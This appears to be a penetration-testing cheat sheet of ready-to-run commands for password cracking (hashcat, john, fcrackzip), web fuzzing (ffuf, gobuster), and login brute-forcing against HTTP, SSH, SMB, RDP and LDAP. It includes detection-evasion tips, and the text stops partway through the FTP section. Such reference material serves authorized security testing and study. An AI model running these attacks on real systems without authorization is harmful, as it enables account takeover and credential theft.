# Cracking / Fuzzing / Brute-force

## 00. Create Wordlists

### 00.1 Crunch

```bash
## ------------------| Usage
## crunch will display a wordlist that starts at a and ends at zzzzzzzz
crunch 8 8 -t @,%^
### Specifies a pattern, eg: @@god@@@@ where the only the @'s, ,'s, %'s, and  ^'s  will change.
### @ --> lower case characters
### , --> upper case characters
### % --> numbers
### ^ --> symbols

## crunch will display a wordlist using the character set abcdefg that starts at a and ends at gggggg
crunch 1 6 abcdefg

## ------------------| Best Usages
crunch 4 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
```

### 00.2 CeWL

```bash
cewl --with-numbers -d 7 -m 5 -w cewl.out http(s)://IP/anything/

# -d : Depth to spider to, default 2.
# -m : Minimum word length, default 3.
# -w : Write the output to the file.
# -c : Show the count for each word found.
# -o : Let the spider visit other sites.
# --with-numbers: Accept words with numbers in as well as just letters
# --header : In format name:value - can pass multiple.
# --lowercase : Lowercase all parsed words
# --auth_user : Authentication username.
# --auth_pass : Authentication password.
# --proxy_host: Proxy host.
# --proxy_port: Proxy port, default 8080.
```

### 00.3 [UserNameGen](https://github.com/h4rithd/UserNameGen)

```bash
wget https://raw.githubusercontent.com/h4rithd/UserNameGen/master/usernamegen.py
pip install argparse textwrap3 tqdm

python usernamegen.py -o output.txt -u "Harith Dilshan" 
python usernamegen.py -o output.txt -f usernames.txt
```

### 00.4 [Username-Anarchy](https://github.com/urbanadventurer/username-anarchy.git)

<pre class="language-bash"><code class="lang-bash">## ------------------| Genarate quick username list for single user
ruby username-anarchy h4rithd dilshan

## ------------------| List username format plugins
ruby username-anarchy –list-formats

<strong>## ------------------| Genarate username list from file
</strong>ruby username-anarchy -input-file names.txt –select-format first,first.last,f.last,flast > newlist.txt          
</code></pre>

## 01. Cracking Basic

### 01.1 Hashcat Basic

* Click [here](https://hashcat.net/wiki/doku.php?id=example_hashes)! to view example hashes (for to select mode -m)

```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
```

* Common flags

```bash
-a             Attack-mode
--force        Ignore warnings
--status       Enable automatic update of the status screen
--status-json  Enable JSON format for status output
--session      Define specific session name
--restore      Restore session from --session
--outfile      Define outfile for recovered hash

- [ Attack Modes ] -
  # | Mode
 ===+======
  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist
  
- [ Built-in charsets ] -
   # | Mask Attack
 ====+======
  ?l | abcdefghijklmnopqrstuvwxyz
  ?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
  ?d | 0123456789
  ?h | 0123456789abcdef
  ?H | 0123456789ABCDEF
  ?s | «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  ?a | ?l?u?d?s
  ?b | 0x00 - 0xff

```

* Cracking

```bash
## ------------------| Without rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt

## ------------------| With rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt  -r /usr/share/hashcat/rules/best64.rule  
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt  -r /usr/share/hashcat/rules/d3ad0ne.rule   
```

* HashCat Rules

```bash
hashcat --force passwords.list -r /usr/share/hashcat/rules/best64.rule --stdout > passwords.txt

# /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule
# /usr/share/hashcat/rules/T0XlC-insert_space_and_special_0_F.rule
# /usr/share/hashcat/rules/T0XlC-insert_top_100_passwords_1_G.rule
# /usr/share/hashcat/rules/toggles1.rule
# /usr/share/hashcat/rules/specific.rule
# /usr/share/hashcat/rules/leetspeak.rule
# /usr/share/hashcat/rules/toggles2.rule
# /usr/share/hashcat/rules/toggles3.rule
# /usr/share/hashcat/rules/InsidePro-HashManager.rule
# /usr/share/hashcat/rules/T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
# /usr/share/hashcat/rules/generated.rule
# /usr/share/hashcat/rules/T0XlC.rule
# /usr/share/hashcat/rules/oscommerce.rule
# /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule
# /usr/share/hashcat/rules/T0XlCv1.rule
# /usr/share/hashcat/rules/best64.rule
# /usr/share/hashcat/rules/dive.rule
# /usr/share/hashcat/rules/d3ad0ne.rule
# /usr/share/hashcat/rules/toggles5.rule
# /usr/share/hashcat/rules/combinator.rule
# /usr/share/hashcat/rules/toggles4.rule
# /usr/share/hashcat/rules/Incisive-leetspeak.rule
# /usr/share/hashcat/rules/unix-ninja-leetspeak.rule
# /usr/share/hashcat/rules/generated2.rule
# /usr/share/hashcat/rules/rockyou-30000.rule

## OneRuleToRuleThemAll
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule  
```

* Create Rules and Variants

```bash
## ------------------| Create file which has word or wordlist
echo -e "PleaseSubscribe\!" >> hashes

## ------------------| Create new wordlist
hashcat --stdout hashes -r /usr/share/hashcat/rules/best64.rule > pw-list
```

Cheat Sheets

* <https://github.com/frizb/Hashcat-Cheatsheet>
* <https://hashcat.net/wiki/doku.php?id=hashcat>

### 01.2 JohnTheRipper Basic

* Cracking

```bash
john hashfile -w=/usr/share/wordlists/rockyou.txt
```

* John Mutation

```bash
sudo vi /etc/john/john.conf

john --wordlist=words.txt --rules --stdout > new_wordlist.txt
john --wordlist=words.txt --rules=all --stdout > new_wordlist.txt
```

### 01.3 SSH

```bash
python3.8 /usr/share/john/ssh2john.py id_rsa > id_rsa.john
john id_rsa.john -w=/usr/share/wordlists/rockyou.txt
```

### 01.4 ZIP

```bash
## ------------------| For Zip
sudo apt-get install fcrackzip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
## or you can use following command with johntheripper
zip2john file.zip > hash
john hash

## ------------------| For 7z
sudo apt-get install libcompress-raw-lzma-perl
/usr/share/john/7z2john.pl backup.7z > backup.john
john backup.john -w=/usr/share/wordlists/rockyou.txt
## or you can use following command.
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
```

* [ZIpCrypto known plain text attack](https://youtu.be/YGoR2gSDaI4)

### 01.5 PDF

```bash
## ------------------| Using pdfcrack
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt

## ------------------| Using qpdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
```

### 01.6 JWT

```bash
## ------------------| Using hashcat
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

## ------------------| Using jwtcrack
pip install PyJWT tqdm
git clone https://github.com/Sjord/jwtcrack.git && cd jwtcrack​
### Crack using jwtcrack
crackjwt.py <JWT_TOKEN> /usr/share/wordlists/rockyou.txt
### Convert a JWT to a format John the Ripper can understand.
jwt2john.py <JWT_TOKEN> 

## ------------------| Using JohnTheRipper
john jwt_token.txt -w=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256
```

### 01.7 VNC

```bash
echo -n <PassWordHash> | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv      
```

### 01.8 WiFi

```bash
## ------------------| AirCrack-ng
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
```

### 01.9 LUKS

```bash
# ------------------| Using Hashcat
### Get count value 
cryptsetup luksDump backup.img | grep Payload
### Create luks header hashfile
dd if=backup.img of=hash bs=512 count=4097
### Cracking
hashcat -m 14600 hash /usr/share/wordlists/rockyou.txt

# ------------------| Using JohnTheRipper
luks2john.py /dev/sdb1 > sdb1.john
john sdb.john -w=/usr/share/wordlists/rockyou.txt

# ------------------| How to mount/unmount
### Mount
sudo cryptsetup luksOpen backup.img backup
sudo mount /dev/mapper/backup /mnt/ 
### Unmount
sudo umount -l /mnt/
sudo cryptsetup luksClose backup 
```

### 01.10 SUDO

```bash
# ------------------| Clone the sucrack programe and build it
git clone https://github.com/hemp3l/sucrack.git
cd sucrack
autoreconf -f -i
./configure
make
make install 
cd src
ls -al sucrack

## ------------------| Cracking process
./sucrack -a -w 20 -s 10 -u root -r dict.txt
./sucrack -a -w 20 -s 10 -u root -rx dict.tx
```

### 01.11 Microsoft Office

```bash
## ------------------| Hashcat
wget https://raw.githubusercontent.com/stricture/hashstack-server-plugin-oclhashcat/master/scrapers/office2hashcat.py                   
python2 office2hashcat.py file.xls [doc,dot,docm,xlm,ppt] > hash.txt
hashcat hash.txt /usr/share/wordlists/rockyou.txt

## ------------------| JohnTheRipper
wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/office2john.py
python2 office2john.py file.xls [doc,dot,docm,xlm,ppt] > john-hash.txt
john john-hash.txt -w=/usr/share/wordlists/rockyou.txt
```

### 01.12 Group Policy Preferences

```bash
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
```

### 01.13 PFX certificate

```bash
/usr/share/john/pfx2john.py file.pfx > file.pfx.john
john file.pfx.john -w=/usr/share/wordlists/rockyou.txt 
```

### 01.14 KeePass&#x20;

```bash
## ------------------| JohnTheRipper
keepass2john Database.kdbx > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

## ------------------| Hashcat
keepass2john Database.kdbx | awk -F\: '{print $2}' > hash.txt
hashcat -m 13400 hash.txt /usr/share/wordlists/rockyou.txt 

## ------------------| View the passwords
kpcli --kdb Database.kdbx
find .
show /file/path/key -f
```

### 01.15 Ansible

```bash
## ------------------| JohnTheRipper
https://fossies.org/linux/john/run/ansible2john.py
ansible2john file > hash

## ------------------| hashcat
ansible2john file > hash
hashcat -m 16900 hash /usr/share/wordlists/rockyou.txt --user

## ------------------| Decrypted
cat file | ansible-vault decrypt
```

### 01.16 Gitea

```bash
wget https://gist.githubusercontent.com/h4rithd/0c5da36a0274904cafb84871cf14e271/raw/f109d178edbe756f15060244d735181278c9b57e/gitea2hashcat.py
python3 gitea2hashcat.py gitea.db > hashes.txt
hashcat hashes.txt /usr/share/wordlists/rockyou.txt
```

### 01.17 PBKDF2

```bash
## ------------------| PBKDF2:SHA256
wget https://gist.githubusercontent.com/h4rithd/184a49164d6528069437db7d8623b1f8/raw/d7eb4e5c2af7deefee2da5835f2aa44d06be996a/pbkdf2_sha256_hash_cracker.py
python3 pbkdf2_sha256_hash_cracker.py -f hashes.txt -w /usr/share/wordlists/rockyou.txt
```

## 03. Fuzzing Basic

```bash
## ------------------| Extention list
php,html,txt
php,html,txt,bak,tar,zip
php,html,txt,bak,tar,zip,aspx,asp
php,html,txt,bak,tar,zip,aspx,asp,jsp,js
php,html,txt,bak,tar,zip,aspx,asp,jsp,js,htm,exe
```

### 03.1 [ffuf](https://github.com/ffuf/ffuf#example-usage)

{% hint style="danger" %}
Caution: This fucking tool is not good for username/password enumeration because of "**Content-Type**" header. use wfuzz tool or use -request methord.
{% endhint %}

```bash
## ------------------| General options
-H                  Header "Name: Value", separated by colon. Multiple -H flags are accepted.
-X                  HTTP method to use
-b                  Cookie data "NAME1=VALUE1; NAME2=VALUE2" for copy as curl functionality.
-d                  POST data
-c                  Colorize output. (default: false)
-r                  Follow redirects (default: false)
-u                  Target URL
-v                  Verbose output, printing full URL 
-e                  Comma separated list of extensions. (.php,.txt,.html)
-x                  Proxy URL (SOCKS5 or HTTP). For example: http://127.0.0.1:8080 or socks5://127.0.0.1:8080
-ic                 Ignore wordlist comments (default: false)
-sni                Target TLS SNI, does not support FUZZ keyword
-rate               Rate of requests per second (default: 0)
-request            File containing the raw http request (Like burp request)
-request-proto      Protocol to use along with raw request (default: http
-timeout            HTTP request timeout in seconds. (default: 10)
-ignore-body        Do not fetch the response content. (default: false)
-recursion          Scan recursively. Only FUZZ keyword is supported, and URL (-u) has to end in it. (default: false)
-recursion-depth    Maximum recursion depth. (default: 0)
-recursion-strategy Recursion strategy: "default" for a redirect based, and "greedy" to recurse on all matches (default: default)     
-replay-proxy       Replay matched requests using this proxy.

## ------------------|  Filter options
-fc    Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl    Filter by amount of lines in response. Comma separated list of line counts and ranges
-fr    Filter regexp or keyword
-fs    Filter HTTP response size. Comma separated list of sizes and ranges
-ft    Filter by number of milliseconds to the first response byte, either greater or less than. EG: >100 or <100   
-fw    Filter by amount of words in response. Comma separated list of word counts and ranges

## ------------------| Matcher options
-mc    Match HTTP status codes, or "all" for everything. (default: 200,204,301,302,307,401,403,405)
-ml    Match amount of lines in response
-mr    Match regexp
-ms    Match HTTP response size
-mt    Match how many milliseconds to the first response byte, either greater or less than. EG: >100 or <100   
-mw    Match amount of words in response
```

* Stealth Mode

```bash
## ------------------| Throttle Requests
ffuf -c -ic -t 1 -p 2 -u https://h4rithd.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
ffuf -c -ic -t 1 -p 5-10 -u https://h4rithd.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
### -t 1 → single thread (low profile)
### -p 2 → delay of 2 seconds between requests

## ------------------| Randomize User-Agent & Headers
wget https://gist.githubusercontent.com/pzb/b4b6f57144aea7827ae4/raw/cf847b76a142955b1410c8bcef3aabe221a63db1/user-agents.txt
ffuf -c -ic -t 1 -p 2 -H "User-Agent: $(shuf -n 1 user-agents.txt)" -u https://h4rithd.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
ffuf -c -ic -t 1 -p 2 -H "Referer: https://h4rithd.com" -H "X-Forwarded-For: 192.168.1.10" -u https://h4rithd.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
```

* Best Usage

```bash
## ------------------| Directory Fuzz
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://h4rithd.com/FUZZ | tee ffuf.out    

## ------------------| With Extensions
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://h4rithd.com/FUZZ -e .php,.txt,.html | tee ffuf.out    

## ------------------| Fuzz with numbers
ffuf -c -ic -w <(seq 0 2000) -u https://example.org/FUZZ | tee ffuf.out    

## ------------------| Subdomain Fuzz
ffuf -w hosts.txt -u https://example.org/ -H "Host: FUZZ" -mc 200
```

* Multi-wordlist Operation Mode

```bash
## ------------------| Cluster Bomb (Default)
### Tests all combinations of payloads across multiple parameters
### user1:pass1, user1:pass2, user2:pass1, user2:pass2
ffuf -c -ic -mode clusterbomb -w user.txt:user -w password.txt:pass -u https://example.org/user/pass

## ------------------| Pitchfork
### Matches corresponding payloads to multiple parameters in parallel. 
### user1:pass1, user2:pass2
ffuf -c -ic -mode pitchfork -w user.txt:user -w password.txt:pass -u https://example.org/user/pass

## ------------------| Sniper
### Tests one parameter at a time with single payloads
### payload1:default, payload2:default
ffuf -c -ic -mode sniper -w user.txt -u https://example.org/FUZZ/FUZZ
```

* Fuzz with POST data

```bash
## ------------------| application/json
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/json" -d '{"name": "FUZZ", "anotherkey": "anothervalue"}' -fr "error"

## ------------------| application/x-www-form-urlencoded
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "name=admin\&password=FUZZ" -fr "error"

## ------------------| From burp file
ffuf -w entries.txt -request-proto http -request getUsers.req -fr "error"
```

### 03.2 [wfuzz](https://github.com/xmendez/wfuzz)

```bash
## ------------------| Genaral Options
-u url                    : Specify a URL for the request.
-w wordlist               : Specify a wordlist file (alias for -z file,wordlist).
-V alltype                : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method                 : Specify an HTTP method for the request, ie. HEAD or FUZZ
-e <type>                 : List of available encoders/payloads/iterators/printers/scripts
-c                        : Output with colors
-v                        : Verbose information.
-b cookie                 : Specify a cookie for the requests. Repeat option for various cookies.
-d postdata               : Use post data (ex: "id=FUZZ&catalogue=1")
-H header                 : Use header (ex:"Cookie:id=1312321&user=FUZZ"). Repeat option for various headers.
--basic/ntlm/digest auth  : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
-f filename,printer       : Store results in the output file using the specified printer (raw printer if omitted).
-o printer                : Show results using the specified printer.
-t N                      : Specify the number of concurrent connections (10 default)
-s N                      : Specify time delay between requests (0 default)
-R depth                  : Recursive path discovery being depth the maximum recursion level.
-D depth                  : Maximum link depth level.
-L,--follow               : Follow HTTP redirections
-Z                        : Scan mode (Connection errors will be ignored).
--req-delay N             : Sets the maximum time in seconds the request is allowed to take (CURLOPT_TIMEOUT). Default 90.
--conn-delay N            : Sets the maximum time in seconds the connection phase to the server to take (CURLOPT_CONNECTTIMEOUT). Default 90.

## ------------------| Scripts
-A, --AA, --AAA           : Alias for -v -c and --script=default,verbose,discover respectively
--no-cache                : Disable plugins cache. Every request will be scanned.
--script=                 : Equivalent to --script=default
--script=<plugins>        : Runs script's scan. <plugins> is a comma separated list of plugin-files or plugin-categories
--script-help=<plugins>   : Show help about scripts.
--script-args n1=v1,...   : Provide arguments to scripts. ie. --script-args grep.regex="<A href=\"(.*?)\">"

## ------------------| Payloads
-m iterator               : Specify an iterator for combining payloads (product by default)
-z payload                : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
                            A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
                            Encoders category can be used. ie. url
                            Use help as a payload to show payload plugin's details (you can filter using --slice)
--zP <params>             : Arguments for the specified payload (it must be preceded by -z or -w).
--zD <default>            : Default parameter for the specified payload (it must be preceded by -z or -w).
--zE <encoder>            : Encoder for the specified payload (it must be preceded by -z or -w).
--slice <filter>          : Filter payload's elements using the specified expression. It must be preceded by -z.

## ------------------|  Filter options
--filter-help             : Filter language specification
--hc/hl/hw/hh N[,N]+      : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+      : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex             : Show/hide responses with the specified regex within the content
--filter <filter>         : Show/hide responses using the specified filter expression (Use BBB for taking values from baseline)
--prefilter <filter>      : Filter items before fuzzing using the specified expression. Repeat for concatenating filters.
```

* Find valid usernames | POST data

```bash
wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=test123" --hs "No account found with that username" http://10.10.10.97/login.php | tee usernames.txt    
```

* Other commands

```bash
## ------------------| Range script
wfuzz -c -z range,1-65535 http:127.0.0.1:FUZZ

## ------------------| Fuzz with two parameters
wfuzz -c -m zip -z range,1-65535 -w wordlist.txt http:127.0.0.1:FUZZ/FUZ2Z 

## ------------------| With encoders
### List avilable encoders
wfuzz -e encoders
### User url encoder
wfuzz -w /wordlist.txt,uri_hex
```

### 03.3 [Gobuster](https://github.com/OJ/gobuster)

```
## ------------------| Genaral Options
-z, --no-progress                   Don't display progress
-o, --output string                 Output file to write results to (defaults to stdout)
-q, --quiet                         Don't print the banner and other noise
-t, --threads int                   Number of concurrent threads (default 10)
    --delay duration                Time each thread waits between requests (e.g. 1500ms)
-v, --verbose                       Verbose output (errors)
-w, --wordlist string               Path to the wordlist

-f, --add-slash                     Append / to each request
-c, --cookies string                Cookies to use for the requests
-e, --expanded                      Expanded mode, print full URLs
-x, --extensions string             File extension(s) to search for
-r, --follow-redirect               Follow redirects
-H, --headers stringArray           Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
-k, --no-tls-validation             Skip TLS certificate verification
-n, --no-status                     Don't print status codes
-p, --password string               Password for Basic Auth
-P, --proxy string                  Proxy to use for requests [http(s)://host:port][socks5://127.0.0.1:1080]
-s, --status-codes string           Positive status codes (will be overwritten with status-codes-blacklist if set) (default "200,204,301,302,307,401,403")    
-b, --status-codes-blacklist string Negative status codes (will override status-codes if set)
    --timeout duration              HTTP Timeout (default 10s)
-u, --url string                    The target URL
-a, --useragent string              Set the User-Agent string (default "gobuster/3.1.0")
-U, --username string               Username for Basic Auth
-d, --discover-backup               Upon finding a file search for backup files
    --wildcard                      Force continued operation when wildcard found
```

* Best Usage

```bash
gobuster dir -e -f -t 20 -k -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt -o gobuster.out -u https://mysite.com/
```

* **DNS** mode

```bash
gobuster dns -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-dns.out -d google.com 
```

* **VHOST** Mode

```bash
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-vhost.out -u https://mysite.com 
```

* Search backup files

```bash
gobuster dir -e -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -d -o gobuster-backups.out -u https://mysite.com/
```

* Fuzzing Mode

```
gobuster fuzz -u https://example.com?FUZZ=test -w parameter-names.txt
```

### 03.4 [DirSearch](https://github.com/maurosoria/dirsearch)

```bash
## ------------------| Genaral Options
-u    Target URL
-e    Extension list separated by commas (Example: php,asp)
-X    Exclude extension list separated by commas (Example: asp,jsp)
-f    Add extensions to every wordlist entry. By default dirsearch only replaces the %EXT% keyword with extensions     
-t    Number of threads
-r    Brute-force recursively
-i    Include status codes, separated by commas, support ranges (Example: 200,300-399)
-x    Exclude status codes, separated by commas, support ranges (Example: 301,500-599)
-q    Quiet mode
-m    HTTP method (default: GET)
-d    HTTP request data
-H    HTTP request header, support multiple flags (Example:  -H 'Referer: example.com')
-F    Follow HTTP redirects
-s    Delay between requests

-o    Output file
--format    Report format (Available: simple, plain, json, xml,md, csv, html)

--proxy          Proxy URL, support HTTP and SOCKS proxies (Example: localhost:8080, socks5://localhost:8088)
--timeout        Connection timeout
--cookie         Choose a cookie for each request
--user-agent     Choose a User-Agent for each request
--random-agent   Choose a random User-Agent for each request
--full-url       Full URLs in the output (enabled automatically in quiet mode)
--no-color       No colored output
--exclude-sizes  Exclude responses by sizes, separated by commas (Example: 123B,4KB)
--exclude-texts  Exclude responses by texts, separated by commas (Example: 'Not found', 'Error')

-U    Uppercase wordlist
-L    Lowercase wordlist
-C    Capital wordlist

--raw=FILE    Load raw HTTP request from file (use `--scheme` flag to set the scheme)
```

* Best Usage

```bash
dirsearch -r -f -o `pwd`/dirsearch.out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -e php,html,txt -u http://example.org/
```

* When using HTB

```bash
url=http://nineveh.htb/department
dirsearch -f -o `pwd`/$(echo $url | cut -d '/' -f 3).out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u $url -e php  
```

### 03.5 [feroxbuster](https://github.com/epi052/feroxbuster)

```bash
## ------------------| Genaral Options
-u                    The target URL
-a                    Sets the User-Agent (default: feroxbuster/2.7.0)
-A                    Use a random User-Agent
-f                    Append / to each request's URL
-H                    Specify HTTP headers to be used in each request (ex: -H Header:val -H 'stuff: things')
-m                    Which HTTP request method(s) should be sent (default: GET)
-Q                    Request's URL query parameters (ex: -Q token=stuff -Q secret=key)
-x                    File extension(s) to search for (ex: -x php -x pdf js)
-k                    Disables TLS certificate validation in the client
-r                    Allow client to follow redirects
-T                    Number of seconds before a client's request times out (default: 7)
--data                Request's Body; can read data from a file if input starts with an @ (ex: @post.bin)
-b, --cookies         Specify HTTP cookies to be used in each request (ex: -b stuff=things)
--resume-from         State file from which to resume a partially complete scan
--burp                Set --proxy to http://127.0.0.1:8080 and set --insecure to true
--burp-replay         Set --replay-proxy to http://127.0.0.1:8080 and set --insecure to true
--smart               Set --extract-links, --auto-tune, --collect-words, and --collect-backups to true
--thorough            Use the same settings as --smart and set --collect-extensions to true
--force-recursion     Force recursion attempts on all 'found' endpoints (still respects recursion depth)

## ------------------| Response filters
-C                    Filter out status codes (deny list) (ex: -C 200 -C 401)
-N                    Filter out messages of a particular line count (ex: -N 20 -N 31,30)
-s                    Status Codes to include (allow list) (default: 200 204 301 302 307 308 401 403 405)
-S                    Filter out messages of a particular size (ex: -S 5120 -S 4927,1970)
-W                    Filter out messages of a particular word count (ex: -W 312 -W 91,82)
-X                    Filter out messages via regular expression matching on the response's body (ex: -X '^ignore me$')

## ------------------| Dynamic collection settings
-B                    Automatically request likely backup extensions for "found" urls
-E                    Automatically discover extensions and add them to --extensions (unless they're in --dont-collect)
-g                    Automatically discover important words from within responses and add them to the wordlist
-I                    File extension(s) to Ignore while collecting extensions (only used with --collect-extensions)

## ------------------| Output settings
--no-state            Disable state output file (*.state)
--silent              Only print URLs + turn off logging (good for piping a list of urls to other commands)
-o                    Output file to write results to (use w/ --json for JSON entries)
-q                    Hide progress bars and banner (good for tmux windows w/ notifications)
-v                    Increase verbosity level (use -vv or more for greater effect. [CAUTION] 4 -v's is probably too much)
```

* Best Usage

```bash
feroxbuster -k -f -A -u <URL>
```

### 03.6 [Arjun](https://github.com/s0md3v/Arjun)

```bash
## ------------------| Setup
apt-get install arjun
pip3 install arjun

## ------------------| Usage
arjun -u https://api.example.com/endpoint
arjun -u https://api.example.com/endpoint -m POST
arjun -u https://api.example.com/endpoint -m JSON --include='{"root":{"a":"b",$arjun$}}'
```

## 04. Brute-force Basic

### 04.1 HTTP

* Common useful flags

```bash
hydra -u -f -t 10 -w 30  -L users.txt -P pass.txt 192.168.1.69 http-post-form "/login.php:user=^USER^&pass=^PASS^:Bad login" -o hydra-http-post-attack.txt

 # Host   : 192.168.1.69
 # Method : http-form-post / https-post-form / http-get-form / http-get(for basic-auth)
 # URI    : /login.php
 # Form parameters  : user=^USER^&pass=^PASS^
 # Failure response : Bad login
 # -L : users.txt
 # -l : username
 # -P : pass.txt
 # -t : Threads
 # -w : Wait for timeout
 # -S : Perform an SSL connect [https]
 # -s : If the service is on a different default port
 # -o : Output file 
 # -f : exit when a login/pass pair is found
 # -R : Restore a previous aborted/crashed session
 # -I : Ignore an existing restore file
 # -u : Loop around users, not passwords (effective! implied with -x
 
 ## If you want proxy export HYDRA_PROXY_HTTP=http://127.0.0.1:8080 
```

* https-post-form

```bash
hydra -S -u -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password"       
```

* http-get (basic auth) / Tomcat

```bash
hydra -u -f -l admin -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt 10.10.10.157 http-get "/monitoring"   
```

* With headers

```bash
hydra 192.168.1.69 http-post-form "/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo" \
-L users.txt -P pass.txt -t 10 -w 1 -o hydra-http-post-attack.txt
 # in this case we specify that the cookie should be page/cookie
 # cookies can be specified with C=
 # and we also added an header with H= 
 # this header is called X-Foo and has as value Foo
```

### 04.2 SSH

```bash
## ------------------| Using Hydra
hydra -v -V -u -f -L users.txt -p "Password!" -t 2 -u $ip ssh
hydra -v -V -u -f -l root -P /usr/share/wordlists/rockyou.txt -t 2 -u $ip ssh
hydra -v -V -u -f -L users.txt -P /usr/share/wordlists/rockyou.txt -t 2 -u $ip ssh

## -v        Verbose mode
## -L        User List
## -P        Password List
## -V        How login+pass for each attempt
## -u        Loop around users, not passwords (effective! implied with -x)
## -o        Write found login/password pairs to FILE instead of stdout
## -t        Run TASKS number of connects in parallel per target (default: 16)
## -f / -F   Exit when a login/pass pair is found (-M: -f per host, -F global)
## -fr       Regex
```

```bash
## ------------------| Using NCrack
ncrack -v -p 22 --user root -P /usr/share/wordlists/rockyou.txt <IP> -T5

## ------------------| Using Patator
patator ssh_login host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0  
patator ssh_login -x ignore:fgrep='failed' host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0          

## ------------------| Using Medusa
medusa -h <IP> -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -M ssh <IP>          
```

### 04.3 SMB

```bash
## ------------------| Using Nmap
nmap --script smb-brute -p 445 <IP>

## ------------------| Using CrackMapExec
crackmapexec smb <IP> -u users.txt -p /usr/share/wordlists/rockyou.txt --continue-on-success
crackmapexec smb <IP> -u Hazard -p /usr/share/wordlists/rockyou.txt --shares

## ------------------| Using Hydra
hydra -u -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
```

### 04.4 RDP

```bash
## ------------------| Using Hydra
hydra -t 1 -V -f -u -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
hydra -V -f -u -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt rdp://<IP>         

## ------------------| Using NCrack
ncrack -vv --user <UserName> -P /usr/share/wordlists/rockyou.txt rdp://<IP>

## ------------------| Using Crowbar
crowbar -b rdp -s <IP>/CIDR -u <USER> -C /usr/share/wordlists/rockyou.txt
crowbar -b rdp -s <IP>/CIDR -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -C /usr/share/wordlists/rockyou.txt
```

### 04.5 LDAP

```bash
## ------------------| Nmap (Basic)
nmap --script ldap-brute -p 389 <IP>

## ------------------| Using Hydra
hydra -V -f -u -L users.txt -P /usr/share/wordlists/rockyou.txt <IP> ldap2

## ------------------| Using CackMapExec
crackmapexec ldap <IP> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt  
```

### 04.6 FTP

```bash
## ------------------| Using Hydra
hydra -u -f -l root -P /usr/share/wordlists/rockyou.txt [-t 32] <IP> ftp

## ------------------| Using Ncrack
ncrack -p 21 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]

## ------------------| Using Medusa
